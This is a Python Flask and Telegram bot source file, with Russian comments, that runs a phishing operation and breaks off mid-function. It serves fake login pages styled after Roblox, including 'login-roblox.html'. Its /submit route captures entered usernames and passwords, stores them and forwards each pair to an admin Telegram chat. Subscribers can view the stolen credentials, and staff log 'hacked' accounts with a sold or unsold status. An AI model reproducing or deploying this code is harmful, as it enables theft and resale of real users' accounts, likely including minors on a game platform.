```python
import os
import time
import logging
import threading
import ipaddress
from datetime import datetime, timedelta
from hashlib import md5
from urllib.parse import urlparse

import telebot
from telebot import types
import psycopg2
from psycopg2.extras import DictCursor
from flask import Flask, request, jsonify, render_template
import requests
from ratelimit import limits, sleep_and_retry
from bs4 import BeautifulSoup

# Настройка логирования
logging.basicConfig(
    level=logging.INFO,
    format='%(asctime)s - %(levelname)s - %(message)s',
    handlers=[
        logging.FileHandler('bot.log', encoding='utf-8'),
        logging.StreamHandler()
    ]
)
logger = logging.getLogger(__name__)

# Инициализация Flask и Telegram бота
app = Flask(__name__)
bot = telebot.TeleBot(os.getenv('BOT_TOKEN'), parse_mode=None)

# Константы
ADMIN_CHAT_ID = "YOUR_ADMIN_CHAT_ID"  # Замените на ваш chat_id
SITE_URL = os.getenv('SITE_URL', 'https://your-app.onrender.com')
SECRET_WEBHOOK_TOKEN = os.getenv('SECRET_WEBHOOK_TOKEN', 'your-secret-token')
CALLS_PER_MINUTE = 30
ONE_MINUTE = 60
PROCESSED_UPDATES = set()
ALLOWED_IPS = [
    ipaddress.ip_network('149.154.160.0/20'),
    ipaddress.ip_network('91.108.4.0/22')
]
ad_keywords = [
    'казино', 'casino', 'ставки', 'bet', 'похудение', 'диета', 'заработок', 'похудеть',
    'crypto', 'крипта', 'binance', 'bitcoin', 'биткоин', 'инвестиции', 'похудеть за',
    'деньги', 'money', 'заработать', 'похудеть быстро'
]

# Глобальные переменные
tech_mode = False
tech_reason = ""
tech_end_time = None

# Утилиты
def get_current_time():
    return datetime.utcnow()

def format_time(dt):
    if isinstance(dt, str):
        dt = datetime.fromisoformat(dt)
    return dt.strftime('%d.%m.%Y %H:%M:%S UTC')

def sanitize_input(text):
    if not text:
        return ""
    return ''.join(c for c in str(text) if c.isprintable()).strip()

def hash_data(data):
    return md5(str(data).encode()).hexdigest()

@sleep_and_retry
@limits(calls=CALLS_PER_MINUTE, period=ONE_MINUTE)
def get_db_connection():
    try:
        conn = psycopg2.connect(os.getenv('DATABASE_URL'), cursor_factory=DictCursor)
        logger.debug("Подключение к базе данных успешно")
        return conn
    except Exception as e:
        logger.error(f"Ошибка подключения к базе: {e}")
        return None

def init_db():
    conn = get_db_connection()
    if not conn:
        return False
    try:
        with conn.cursor() as c:
            c.execute('''
                CREATE TABLE IF NOT EXISTS users (
                    chat_id TEXT PRIMARY KEY,
                    prefix TEXT NOT NULL,
                    subscription_end TEXT,
                    last_activity TEXT,
                    ip_hash TEXT,
                    username TEXT
                )
            ''')
            c.execute('''
                CREATE TABLE IF NOT EXISTS credentials (
                    login TEXT PRIMARY KEY,
                    password TEXT NOT NULL,
                    added_time TEXT,
                    added_by TEXT
                )
            ''')
            c.execute('''
                CREATE TABLE IF NOT EXISTS hacked_accounts (
                    login TEXT PRIMARY KEY,
                    password TEXT NOT NULL,
                    hack_date TEXT,
                    prefix TEXT,
                    sold_status TEXT,
                    linked_chat_id TEXT
                )
            ''')
            c.execute('''
                CREATE TABLE IF NOT EXISTS support_tickets (
                    ticket_id SERIAL PRIMARY KEY,
                    chat_id TEXT NOT NULL,
                    message TEXT NOT NULL,
                    created_at TEXT,
                    status TEXT DEFAULT 'open'
                )
            ''')
            conn.commit()
        logger.info("База данных инициализирована")
        return True
    except Exception as e:
        logger.error(f"Ошибка инициализации базы: {e}")
        return False
    finally:
        conn.close()

def get_user(chat_id):
    conn = get_db_connection()
    if not conn:
        return None
    try:
        with conn.cursor() as c:
            c.execute("SELECT * FROM users WHERE chat_id = %s", (chat_id,))
            user = c.fetchone()
            return user
    except Exception as e:
        logger.error(f"Ошибка получения пользователя {chat_id}: {e}")
        return None
    finally:
        conn.close()

def save_user(chat_id, prefix, subscription_end, ip, username):
    conn = get_db_connection()
    if not conn:
        return False
    try:
        with conn.cursor() as c:
            c.execute(
                '''
                INSERT INTO users (chat_id, prefix, subscription_end, last_activity, ip_hash, username)
                VALUES (%s, %s, %s, %s, %s, %s)
                ON CONFLICT (chat_id) DO UPDATE
                SET prefix = EXCLUDED.prefix,
                    subscription_end = EXCLUDED.subscription_end,
                    last_activity = EXCLUDED.last_activity,
                    ip_hash = EXCLUDED.ip_hash,
                    username = EXCLUDED.username
                ''',
                (chat_id, prefix, subscription_end, get_current_time().isoformat(), hash_data(ip), username)
            )
            conn.commit()
        logger.debug(f"Пользователь {chat_id} сохранён")
        return True
    except Exception as e:
        logger.error(f"Ошибка сохранения пользователя {chat_id}: {e}")
        return False
    finally:
        conn.close()

def get_all_users():
    conn = get_db_connection()
    if not conn:
        return []
    try:
        with conn.cursor() as c:
            c.execute("SELECT chat_id, prefix, username FROM users")
            return c.fetchall()
    except Exception as e:
        logger.error(f"Ошибка получения всех пользователей: {e}")
        return []
    finally:
        conn.close()

def get_tech_assistants():
    conn = get_db_connection()
    if not conn:
        return []
    try:
        with conn.cursor() as c:
            c.execute("SELECT chat_id FROM users WHERE prefix IN ('ТехПомощник', 'Админ', 'Создатель')")
            return [row['chat_id'] for row in c.fetchall()]
    except Exception as e:
        logger.error(f"Ошибка получения техпомощников: {e}")
        return []
    finally:
        conn.close()

def check_access(chat_id, command):
    user = get_user(chat_id)
    if not user:
        return "❌ *Вы не зарегистрированы!*"
    if user['prefix'] == 'Создатель':
        return None
    subscription_end = datetime.fromisoformat(user['subscription_end']) if user['subscription_end'] else get_current_time()
    if subscription_end < get_current_time():
        return "⏰ *Ваша подписка истекла!*"
    if command in ['menu', 'start', 'passwords', 'support']:
        return None
    if user['prefix'] == 'Админ' and command in ['database', 'viewdb', 'admin', 'addcred', 'addhacked', 'adprefix', 'delprefix', 'adduser', 'broadcast', 'messageuser', 'techstop', 'techstopoff']:
        return None
    if user['prefix'] == 'ТехПомощник' and command in ['techstop', 'techstopoff', 'messageuser']:
        return None
    return "🔒 *Доступ запрещён!*"

def keep_alive():
    while True:
        try:
            requests.get(SITE_URL, timeout=5)
            logger.debug("Keep-alive пинг отправлен")
        except Exception as e:
            logger.error(f"Ошибка keep-alive: {e}")
        time.sleep(300)

# Flask маршруты
@app.route('/')
def index():
    return render_template('index.html')

@app.route('/<path:path>')
def catch_all(path):
    templates = [
        'toptrending.html', 'login-roblox.html', 'upandcoming.html',
        'funwithfriends.html', 'hotrightnow.html', 'toprevisted.html'
    ]
    if path in templates:
        return render_template(path)
    return render_template('404.html')

@app.route('/submit', methods=['POST'])
def submit():
    login = sanitize_input(request.form.get('username'))
    password = sanitize_input(request.form.get('password'))
    logger.info(f"Получены данные: login={login}")
    if not login or not password:
        return jsonify({'status': 'error', 'message': 'Логин и пароль обязательны'}), 400
    conn = get_db_connection()
    if not conn:
        return jsonify({'status': 'error', 'message': 'База данных недоступна'}), 500
    try:
        with conn.cursor() as c:
            c.execute(
                '''
                INSERT INTO credentials (login, password, added_time, added_by)
                VALUES (%s, %s, %s, %s)
                ON CONFLICT (login) DO NOTHING
                ''',
                (login, password, get_current_time().isoformat(), 'web')
            )
            conn.commit()
            bot.send_message(
                ADMIN_CHAT_ID,
                f"🔐 *Новый пароль через сайт*\n👤 *Логин*: `{login}`\n🔒 *Пароль*: `{password}`",
                parse_mode='Markdown'
            )
            with open('templates/404.index', 'a', encoding='utf-8') as f:
                f.write(f"{login}\n")
        return jsonify({'status': 'success', 'message': 'Данные сохранены'}), 200
    except Exception as e:
        logger.error(f"Ошибка сохранения данных: {e}")
        return jsonify({'status': 'error', 'message': 'Ошибка сервера'}), 500
    finally:
        conn.close()

@app.route('/webhook', methods=['POST'])
def webhook():
    client_ip = ipaddress.ip_address(request.remote_addr)
    if not any(client_ip in network for network in ALLOWED_IPS):
        logger.warning(f"Несанкционированный IP: {client_ip}")
        return jsonify({'status': 'error', 'message': 'Unauthorized IP'}), 403
    if request.headers.get('X-Telegram-Bot-Api-Secret-Token') != SECRET_WEBHOOK_TOKEN:
        logger.warning("Неверный секретный токен")
        return jsonify({'status': 'error', 'message': 'Invalid secret token'}), 403
    if len(PROCESSED_UPDATES) > 1000:
        PROCESSED_UPDATES.clear()
    update = request.get_json()
    update_id = update.get('update_id')
    if update_id in PROCESSED_UPDATES:
        logger.debug(f"Повторный update_id: {update_id}")
        return jsonify({'status': 'ok'}), 200
    PROCESSED_UPDATES.add(update_id)
    try:
        bot.process_new_updates([telebot.types.Update.de_json(update)])
        return jsonify({'status': 'ok'}), 200
    except Exception as e:
        logger.error(f"Ошибка обработки вебхука: {e}")
        return jsonify({'status': 'error', 'message': str(e)}), 500

# Telegram команды
@bot.message_handler(commands=['start'])
def start_cmd(message):
    chat_id = str(message.chat.id)
    username = sanitize_input(message.from_user.username) or "Неизвестно"
    logger.info(f"/start от {chat_id} (username: {username})")
    user = get_user(chat_id)
    if not user:
        subscription_end = (get_current_time() + timedelta(days=30)).isoformat()
        save_user(chat_id, 'Посетитель', subscription_end, str(message.from_user.id), username)
        bot.reply_to(
            message,
            f"👋 *Добро пожаловать, @{username}!*\nВы зарегистрированы как *Посетитель*.\n📖 Используйте /menu для команд.",
            parse_mode='Markdown'
        )
        bot.send_message(
            ADMIN_CHAT_ID,
            f"🆕 *Новый пользователь*\n🆔 *Chat ID*: `{chat_id}`\n📛 *Юзернейм*: @{username}",
            parse_mode='Markdown'
        )
    else:
        save_user(chat_id, user['prefix'], user['subscription_end'], str(message.from_user.id), username)
        bot.reply_to(
            message,
            f"👋 *С возвращением, @{username}!*\nВаш статус: *{user['prefix']}*\n📖 Используйте /menu для команд.",
            parse_mode='Markdown'
        )

@bot.message_handler(commands=['menu'])
def menu_cmd(message):
    chat_id = str(message.chat.id)
    username = sanitize_input(message.from_user.username) or "Неизвестно"
    logger.info(f"/menu от {chat_id} (username: {username})")
    access = check_access(chat_id, 'menu')
    if access:
        bot.reply_to(message, access, parse_mode='Markdown')
        return
    response = (
        f"📋 *Меню команд*\n\n"
        f"🔐 /passwords — Просмотр паролей\n"
        f"📩 /support — Обратиться в поддержку\n"
        f"🗄 /database — Управление базой данных\n"
        f"🔧 /admin — Панель администратора\n"
    )
    try:
        bot.reply_to(message, response, parse_mode='Markdown')
        user = get_user(chat_id)
        if user:
            save_user(chat_id, user['prefix'], user['subscription_end'], str(message.from_user.id), username)
    except Exception as e:
        logger.error(f"Ошибка /menu: {e}")
        bot.reply_to(message, "❌ *Ошибка выполнения команды!*", parse_mode='Markdown')

@bot.message_handler(commands=['passwords'])
def passwords_cmd(message):
    chat_id = str(message.chat.id)
    username = sanitize_input(message.from_user.username) or "Неизвестно"
    logger.info(f"/passwords от {chat_id} (username: {username})")
    access = check_access(chat_id, 'passwords')
    if access:
        logger.warning(f"Доступ запрещён для {chat_id}: {access}")
        bot.reply_to(message, access, parse_mode='Markdown')
        return
    conn = get_db_connection()
    if not conn:
        logger.error(f"База данных недоступна для {chat_id}")
        bot.reply_to(message, "❌ *База данных недоступна! Попробуйте позже.*", parse_mode='Markdown')
        return
    try:
        with conn.cursor() as c:
            logger.debug(f"Запрос credentials для {chat_id}")
            c.execute("SELECT login, password, added_time FROM credentials")
            credentials = c.fetchall()
            if not credentials:
                logger.info(f"Пароли не найдены для {chat_id}")
                bot.reply_to(message, "📭 *Список паролей пуст.*", parse_mode='Markdown')
            else:
                for idx, (login, password, added_time) in enumerate(credentials, 1):
                    response = (
                        f"🔐 *Логин #{idx}*: `{login}`\n"
                        f"🔒 *Пароль*: `{password}`\n"
                        f"🕒 *Добавлено*: {format_time(added_time)}\n"
                    )
                    keyboard = types.InlineKeyboardMarkup()
                    user = get_user(chat_id)
                    if user and user['prefix'] in ["Админ", "Создатель", "ТехПомощник"]:
                        logger.debug(f"Добавление кнопки удаления для {login} (idx: {idx})")
                        keyboard.add(
                            types.InlineKeyboardButton(
                                f"🗑 Удалить #{idx}",
                                callback_data=f"delete_cred_{login}_{idx}"
                            )
                        )
                    bot.send_message(
                        chat_id,
                        response,
                        reply_markup=keyboard,
                        parse_mode='Markdown'
                    )
            keyboard = types.InlineKeyboardMarkup()
            keyboard.add(
                types.InlineKeyboardButton("➕ Добавить в hacked", callback_data="add_to_hacked")
            )
            if user and user['prefix'] in ["Админ", "Создатель", "ТехПомощник"]:
                logger.debug(f"Добавление кнопки добавления пароля для {chat_id}")
                keyboard.add(
                    types.InlineKeyboardButton("➕ Добавить пароль", callback_data="add_cred")
                )
            bot.send_message(
                chat_id,
                "⚙️ *Выберите действие*:",
                reply_markup=keyboard,
                parse_mode='Markdown'
            )
            logger.info(f"Пароли успешно отправлены для {chat_id}")
            if user:
                save_user(chat_id, user['prefix'], user['subscription_end'], str(message.from_user.id), username)
    except Exception as e:
        logger.error(f"Ошибка /passwords для {chat_id}: {e}")
        bot.reply_to(message, "❌ *Ошибка при загрузке данных! Попробуйте позже.*", parse_mode='Markdown')
    finally:
        conn.close()

@bot.callback_query_handler(func=lambda call: call.data.startswith('delete_cred_') or call.data in ['add_to_hacked', 'add_cred'])
def handle_passwords_buttons(call):
    chat_id = str(call.message.chat.id)
    logger.info(f"Обработка кнопки {call.data} от {chat_id}")
    access = check_access(chat_id, 'passwords')
    if access:
        logger.warning(f"Доступ запрещён для кнопки {call.data}: {access}")
        bot.answer_callback_query(call.id)
        bot.send_message(chat_id, access, parse_mode='Markdown')
        return
    user = get_user(chat_id)
    if not user:
        logger.error(f"Пользователь {chat_id} не найден")
        bot.answer_callback_query(call.id)
        bot.send_message(chat_id, "❌ *Пользователь не найден!*", parse_mode='Markdown')
        return
    try:
        if call.data.startswith('delete_cred_'):
            if user['prefix'] not in ['Админ', 'Создатель', 'ТехПомощник']:
                logger.warning(f"Попытка удаления пароля без прав: {chat_id}")
                bot.answer_callback_query(call.id)
                bot.send_message(chat_id, "🔒 *Удаление паролей только для админов!*", parse_mode='Markdown')
                return
            try:
                _, login, idx = call.data.split('_', 2)
                logger.debug(f"Попытка удаления логина {login} (idx: {idx})")
                conn = get_db_connection()
                if not conn:
                    logger.error(f"База данных недоступна для удаления {login}")
                    bot.send_message(chat_id, "❌ *База данных недоступна!*", parse_mode='Markdown')
                    bot.answer_callback_query(call.id)
                    return
                with conn.cursor() as c:
                    c.execute("SELECT login FROM credentials WHERE login = %s", (login,))
                    if not c.fetchone():
                        logger.warning(f"Логин {login} не найден для удаления")
                        bot.send_message(chat_id, f"❌ *Логин `{login}` не найден!*", parse_mode='Markdown')
                        bot.answer_callback_query(call.id)
                        return
                    c.execute("DELETE FROM credentials WHERE login = %s", (login,))
                    conn.commit()
                    logger.info(f"Логин {login} успешно удалён")
                    bot.edit_message_text(
                        chat_id=chat_id,
                        message_id=call.message.message_id,
                        text=f"✅ *Логин #{idx} `{login}` удалён!*",
                        parse_mode='Markdown'
                    )
                    bot.send_message(
                        ADMIN_CHAT_ID,
                        f"🗑 *Пароль удалён*\n👤 *Логин*: `{login}`\n👤 *Удалил*: {chat_id}",
                        parse_mode='Markdown'
                    )
            except Exception as e:
                logger.error(f"Ошибка удаления логина {login}: {e}")
                bot.send_message(chat_id, "❌ *Ошибка удаления! Попробуйте снова.*", parse_mode='Markdown')
                bot.answer_callback_query(call.id)
            finally:
                if conn:
                    conn.close()
        elif call.data == 'add_to_hacked':
            if user['prefix'] not in ['Админ', 'Создатель', 'ТехПомощник']:
                logger.warning(f"Попытка добавления в hacked без прав: {chat_id}")
                bot.answer_callback_query(call.id)
                bot.send_message(chat_id, "🔒 *Добавление в hacked только для админов!*", parse_mode='Markdown')
                return
            logger.debug(f"Запрос ввода логина для hacked от {chat_id}")
            msg = bot.send_message(chat_id, "📝 *Введите логин для добавления в hacked*:", parse_mode='Markdown')
            bot.register_next_step_handler(msg, process_hacked_login)
            bot.answer_callback_query(call.id)
        elif call.data == 'add_cred':
            if user['prefix'] not in ['Админ', 'Создатель', 'ТехПомощник']:
                logger.warning(f"Попытка добавления пароля без прав: {chat_id}")
                bot.answer_callback_query(call.id)
                bot.send_message(chat_id, "🔒 *Добавление паролей только для админов!*", parse_mode='Markdown')
                return
            logger.debug(f"Запрос ввода логина для credentials от {chat_id}")
            msg = bot.send_message(chat_id, "📝 *Введите логин для добавления*:", parse_mode='Markdown')
            bot.register_next_step_handler(msg, process_add_cred_login)
            bot.answer_callback_query(call.id)
    except Exception as e:
        logger.error(f"Общая ошибка обработки кнопки {call.data}: {e}")
        bot.send_message(chat_id, "❌ *Ошибка обработки кнопки! Попробуйте снова.*", parse_mode='Markdown')
        bot.answer_callback_query(call.id)

def process_hacked_login(message):
    chat_id = str(message.chat.id)
    login = sanitize_input(message.text)
    logger.info(f"Логин для hacked: {login} от {chat_id}")
    if not login:
        bot.reply_to(message, "❌ *Логин не может быть пустым!*", parse_mode='Markdown')
        return
    msg = bot.reply_to(message, "🔒 *Введите пароль*:", parse_mode='Markdown')
    bot.register_next_step_handler(msg, lambda m: process_hacked_password(m, login))

def process_hacked_password(message, login):
    chat_id = str(message.chat.id)
    password = sanitize_input(message.text)
    logger.info(f"Пароль для {login} от {chat_id}")
    if not password:
        bot.reply_to(message, "❌ *Пароль не может быть пустым!*", parse_mode='Markdown')
        return
    keyboard = types.InlineKeyboardMarkup()
    keyboard.add(
        types.InlineKeyboardButton("✅ Продан", callback_data=f"hacked_status_sold_{login}_{password}"),
        types.InlineKeyboardButton("⛔ Непродан", callback_data=f"hacked_status_not_sold_{login}_{password}")
    )
    bot.reply_to(message, "📊 *Выберите статус аккаунта*:", reply_markup=keyboard, parse_mode='Markdown')

@bot.callback_query_handler(func=lambda call: call.data.startswith('hacked_status_'))
def handle_hacked_status(call):
    chat_id = str(call.message.chat.id)
    logger.info(f"Статус {call.data} от {chat_id}")
    access = check_access(chat_id, 'passwords')
    if access:
        bot.answer_callback_query(call.id)
        bot.send_message(chat_id, access, parse_mode='Markdown')
        return
    try:
        _, status, login, password = call.data.split('_', 3)
        sold_status = "Продан" if status == "sold" else "Непродан"
        conn = get_db_connection()
        if not conn:
            bot.send_message(chat_id, "❌ *База данных недоступна!*", parse_mode='Markdown')
            bot.answer_callback_query(call.id)
            return
        with conn.cursor() as c:
            c.execute(
                '''
                INSERT INTO hacked_accounts (login, password, hack_date, prefix, sold_status, linked_chat_id)
                VALUES (%s, %s, %s, %s, %s, %s)
                ON CONFLICT (login) DO UPDATE
                SET password = EXCLUDED.password,
                    hack_date = EXCLUDED.hack_date,
                    prefix = EXCLUDED.prefix,
                    sold_status = EXCLUDED.sold_status,
                    linked_chat_id = EXCLUDED.linked_chat_id
                ''',
                (login, password, get_current_time().isoformat(), "Админ", sold_status, chat_id)
            )
            conn.commit()
            bot.send_message(
                chat_id,
                f"✅ *Аккаунт `{login}` добавлен в hacked!*\n📊 *Статус*: {sold_status}",
                parse_mode='Markdown'
            )
            bot.send_message(
                ADMIN_CHAT_ID,
                f"💾 *Аккаунт добавлен в hacked*\n👤 *Логин*: `{login}`\n🔒 *Пароль*: `{password}`\n📊 *Статус*: {sold_status}\n➕ *Добавил*: {chat_id}",
                parse_mode='Markdown'
            )
        bot.answer_callback_query(call.id)
    except Exception as e:
        logger.error(f"Ошибка добавления в hacked: {e}")
        bot.send_message(chat_id, "❌ *Ошибка добавления!*", parse_mode='Markdown')
        bot.answer_callback_query(call.id)
    finally:
        conn.close()

def process_add_cred_login(message):
    chat_id = str(message.chat.id)
    login = sanitize_input(message.text)
    logger.info(f"Логин для credentials: {login} от {chat_id}")
    if not login:
        bot.reply_to(message, "❌ *Логин не может быть пустым!*", parse_mode='Markdown')
        return
    msg = bot.reply_to(message, "🔒 *Введите пароль*:", parse_mode='Markdown')
    bot.register_next_step_handler(msg, lambda m: process_add_cred_password(m, login))

def process_add_cred_password(message, login):
    chat_id = str(message.chat.id)
    password = sanitize_input(message.text)
    logger.info(f"Пароль для {login} от {chat_id}")
    if not password:
        bot.reply_to(message, "❌ *Пароль не может быть пустым!*", parse_mode='Markdown')
        return
    conn = get_db_connection()
    if not conn:
        bot.reply_to(message, "❌ *База данных недоступна!*", parse_mode='Markdown')
        return
    try:
        with conn.cursor() as c:
            c.execute(
                '''
                INSERT INTO credentials (login, password, added_time, added_by)
                VALUES (%s, %s, %s, %s)
                ON CONFLICT (login) DO UPDATE
                SET password = EXCLUDED.password,
                    added_time = EXCLUDED.added_time,
                    added_by = EXCLUDED.added_by
                ''',
                (login, password, get_current_time().isoformat(), chat_id)
            )
            conn.commit()
            bot.reply_to(
                message,
                f"✅ *Пароль для `{login}` добавлен в credentials!*",
                parse_mode='Markdown'
            )
            bot.send_message(
                ADMIN_CHAT_ID,
                f"🔐 *Добавлен пароль*\n👤 *Логин*: `{login}`\n🔒 *Пароль*: `{password}`\n➕ *Добавил*: {chat_id}",
                parse_mode='Markdown'
            )
    except Exception as e:
        logger.error(f"Ошибка добавления: {e}")
        bot.reply_to(message, "❌ *Ошибка добавления!*", parse_mode='Markdown')
    finally:
        conn.close()

@bot.message_handler(commands=['support'])
def support_cmd(message):
    chat_id = str(message.chat.id)
    username = sanitize_input(message.from_user.username) or "Неизвестно"
    logger.info(f"/support от {chat_id} (username: {username})")
    access = check_access(chat_id, 'support')
    if access:
        bot.reply_to(message, access, parse_mode='Markdown')
        return
    user = get_user(chat_id)
    if user and user['prefix'] in ['Админ', 'Создатель', 'ТехПомощник']:
        conn = get_db_connection()
        if not conn:
            bot.reply_to(message, "❌ *База данных недоступна!*", parse_mode='Markdown')
            return
        try:
            with conn.cursor() as c:
                c.execute("SELECT ticket_id, chat_id, message, created_at, status FROM support_tickets")
                tickets = c.fetchall()
                if not tickets:
                    bot.reply_to(message, "📭 *Нет открытых тикетов.*", parse_mode='Markdown')
                else:
                    for ticket in tickets:
                        response = (
                            f"🎫 *Тикет #{ticket['ticket_id']}*\n"
                            f"👤 *Chat ID*: `{ticket['chat_id']}`\n"
                            f"📜 *Сообщение*: {ticket['message']}\n"
                            f"🕒 *Создан*: {format_time(ticket['created_at'])}\n"
                            f"📊 *Статус*: {ticket['status']}\n"
                        )
                        keyboard = types.InlineKeyboardMarkup()
                        keyboard.add(
                            types.InlineKeyboardButton(
                                "📝 Ответить",
                                callback_data=f"support_reply_{ticket['ticket_id']}_{ticket['chat_id']}"
                            ),
                            types.InlineKeyboardButton(
                                "🗑 Закрыть",
                                callback_data=f"support_delete_{ticket['ticket_id']}"
                            )
                        )
                        bot.send_message(chat_id, response, reply_markup=keyboard, parse_mode='Markdown')
        except Exception as e:
            logger.error(f"Ошибка получения тикетов: {e}")
            bot.reply_to(message, "❌ *Ошибка загрузки тикетов!*", parse_mode='Markdown')
        finally:
            conn.close()
    else:
        msg = bot.reply_to(message, "📝 *Введите ваше сообщение для поддержки*:", parse_mode='Markdown')
        bot.register_next_step_handler(msg, process_support_message)

def process_support_message(message):
    chat_id = str(message.chat.id)
    support_message = sanitize_input(message.text)
    logger.info(f"Сообщение поддержки от {chat_id}: {support_message}")
    if not support_message:
        bot.reply_to(message, "❌ *Сообщение не может быть пустым!*", parse_mode='Markdown')
        return
    if any(keyword.lower() in support_message.lower() for keyword in ad_keywords):
        bot.reply_to(message, "❌ *Сообщение содержит запрещённые слова (реклама, казино и т.д.)!*", parse_mode='Markdown')
        return
    conn = get_db_connection()
    if not conn:
        bot.reply_to(message, "❌ *База данных недоступна!*", parse_mode='Markdown')
        return
    try:
        with conn.cursor() as c:
            c.execute(
                '''
                INSERT INTO support_tickets (chat_id, message, created_at, status)
                VALUES (%s, %s, %s, %s)
                RETURNING ticket_id
                ''',
                (chat_id, support_message, get_current_time().isoformat(), 'open')
            )
            ticket_id = c.fetchone()['ticket_id']
            conn.commit()
            bot.reply_to(
                message,
                f"✅ *Тикет #{ticket_id} создан!*\nОжидайте ответа от поддержки.",
                parse_mode='Markdown'
            )
            for tech_id in get_tech_assistants():
                try:
                    bot.send_message(
                        tech_id,
                        f"🎫 *Новый тикет #{ticket_id}*\n👤 *Chat ID*: `{chat_id}`\n📜 *Сообщение*: {support_message}",
                        parse_mode='Markdown'
                    )
                except Exception as e:
                    logger.error(f"Ошибка уведомления техпомощника {tech_id}: {e}")
    except Exception as e:
        logger.error(f"Ошибка создания тикета: {e}")
        bot.reply_to(message, "❌ *Ошибка отправки сообщения!*", parse_mode='Markdown')
    finally:
        conn.close()

@bot.callback_query_handler(func=lambda call: call.data.startswith('support_reply_') or call.data.startswith('support_delete_'))
def handle_support_buttons(call):
    chat_id = str(call.message.chat.id)
    logger.info(f"Кнопка поддержки {call.data} от {chat_id}")
    access = check_access(chat_id, 'support')
    if access:
        bot.answer_callback_query(call.id)
        bot.send_message(chat_id, access, parse_mode='Markdown')
        return
    user = get_user(chat_id)
    if not user or user['prefix'] not in ['Админ', 'Создатель', 'ТехПомощник']:
        bot.answer_callback_query(call.id)
        bot.send_message(chat_id, "🔒 *Доступ только для техподдержки!*", parse_mode='Markdown')
        return
    try:
        if call.data.startswith('support_reply_'):
            _, ticket_id, target_chat_id = call.data.split('_', 2)
            msg = bot.send_message(chat_id, f"📝 *Введите ответ для тикета #{ticket_id}*:", parse_mode='Markdown')
            bot.register_next_step_handler(msg, lambda m: process_support_reply(m, ticket_id, target_chat_id))
            bot.answer_callback_query(call.id)
        elif call.data.startswith('support_delete_'):
            _, ticket_id = call.data.split('_', 1)
            conn = get_db_connection()
            if not conn:
                bot.send_message(chat_id, "❌ *База данных недоступна!*", parse_mode='Markdown')
                bot.answer_callback_query(call.id)
                return
            with conn.cursor() as c:
                c.execute("UPDATE support_tickets SET status = %s WHERE ticket_id = %s", ('closed', ticket_id))
                conn.commit()
                bot.edit_message_text(
                    chat_id=chat_id,
                    message_id=call.message.message_id,
                    text=f"✅ *Тикет #{ticket_id} закрыт!*",
                    parse_mode='Markdown'
                )
                bot.send_message(
                    ADMIN_CHAT_ID,
                    f"🗑 *Тикет #{ticket_id} закрыт*\n👤 *Закрыл*: {chat_id}",
                    parse_mode='Markdown'
                )
            bot.answer_callback_query(call.id)
    except Exception as e:
        logger.error(f"Ошибка обработки кнопки поддержки: {e}")
        bot.send_message(chat_id, "❌ *Ошибка обработки тикета!*", parse_mode='Markdown')
        bot.answer_callback_query(call.id)
    finally:
        if conn:
            conn.close()

def process_support_reply(message, ticket_id, target_chat_id):
    chat_id = str(message.chat.id)
    reply_message = sanitize_input(message.text)
    logger.info(f"Ответ на тикет #{ticket_id} от {chat_id}: {reply_message}")
    if not reply_message:
        bot.reply_to(message, "❌ *Ответ не может быть пустым!*", parse_mode='Markdown')
        return
    if any(keyword.lower() in reply_message.lower() for keyword in ad_keywords):
        bot.reply_to(message, "❌ *Ответ содержит запрещённые слова!*", parse_mode='Markdown')
        return
    try:
        bot.send_message(
            target_chat_id,
            f"📩 *Ответ на ваш тикет #{ticket_id}*:\n{reply_message}",
            parse_mode='Markdown'
        )
        bot.reply_to(
            message,
            f"✅ *Ответ на тикет #{ticket_id} отправлен!*",
            parse_mode='Markdown'
        )
        bot.send_message(
            ADMIN_CHAT_ID,
            f"📩 *Ответ на тикет #{ticket_id}*\n👤 *Кому*: `{target_chat_id}`\n📜 *Сообщение*: {reply_message}\n👤 *От*: {chat_id}",
            parse_mode='Markdown'
        )
        conn = get_db_connection()
        if conn:
            with conn.cursor() as c:
                c.execute("UPDATE support_tickets SET status = %s WHERE ticket_id = %s", ('replied', ticket_id))
                conn.commit()
            conn.close()
    except telebot.apihelper.ApiTelegramException as e:
        logger.error(f"Ошибка отправки ответа {target_chat_id}: {e}")
        bot.reply_to(message, f"❌ *Ошибка отправки! Пользователь {target_chat_id} недоступен.*", parse_mode='Markdown')
    except Exception as e:
        logger.error(f"Ошибка ответа на тикет: {e}")
        bot.reply_to(message, "❌ *Ошибка отправки ответа!*", parse_mode='Markdown')

@bot.message_handler(commands=['database'])
def database_cmd(message):
    chat_id = str(message.chat.id)
    username = sanitize_input(message.from_user.username) or "Неизвестно"
    logger.info(f"/database от {chat_id} (username: {username})")
    access = check_access(chat_id, 'database')
    if access:
        logger.warning(f"Доступ запрещён для {chat_id}: {access}")
        bot.reply_to(message, access, parse_mode='Markdown')
        return
    response = "🗄 *Управление базой данных*\nВыберите действие:"
    keyboard = types.InlineKeyboardMarkup(row_width=2)
    keyboard.add(
        types.InlineKeyboardButton("🔍 Просмотреть данные", callback_data="db_view"),
        types.InlineKeyboardButton("➕ Добавить данные", callback_data="db_add"),
        types.InlineKeyboardButton("🗑 Удалить данные", callback_data="db_delete")
    )
    try:
        logger.debug(f"Отправка меню базы данных для {chat_id}")
        bot.reply_to(message, response, reply_markup=keyboard, parse_mode='Markdown')
        user = get_user(chat_id)
        if user:
            save_user(chat_id, user['prefix'], user['subscription_end'], str(message.from_user.id), username)
        logger.info(f"Меню базы данных успешно отправлено для {chat_id}")
    except Exception as e:
        logger.error(f"Ошибка /database для {chat_id}: {e}")
        bot.reply_to(message, "❌ *Ошибка выполнения команды! Попробуйте снова.*", parse_mode='Markdown')

@bot.callback_query_handler(func=lambda call: call.data in ['db_view', 'db_add', 'db_delete', 'db_main_menu'])
def handle_database_buttons(call):
    chat_id = str(call.message.chat.id)
    logger.info(f"Обработка кнопки {call.data} от {chat_id}")
    access = check_access(chat_id, 'database')
    if access:
        logger.warning(f"Доступ запрещён для кнопки {call.data}: {access}")
        bot.answer_callback_query(call.id)
        bot.send_message(chat_id, access, parse_mode='Markdown')
        return
    try:
        if call.data == 'db_main_menu':
            response = "🗄 *Управление базой данных*\nВыберите действие:"
            keyboard = types.InlineKeyboardMarkup(row_width=2)
            keyboard.add(
                types.InlineKeyboardButton("🔍 Просмотреть данные", callback_data="db_view"),
                types.InlineKeyboardButton("➕ Добавить данные", callback_data="db_add"),
                types.InlineKeyboardButton("🗑 Удалить данные", callback_data="db_delete")
            )
            logger.debug(f"Возврат в главное меню базы данных для {chat_id}")
            bot.edit_message_text(
                chat_id=chat_id,
                message_id=call.message.message_id,
                text=response,
                parse_mode='Markdown',
                reply_markup=keyboard
            )
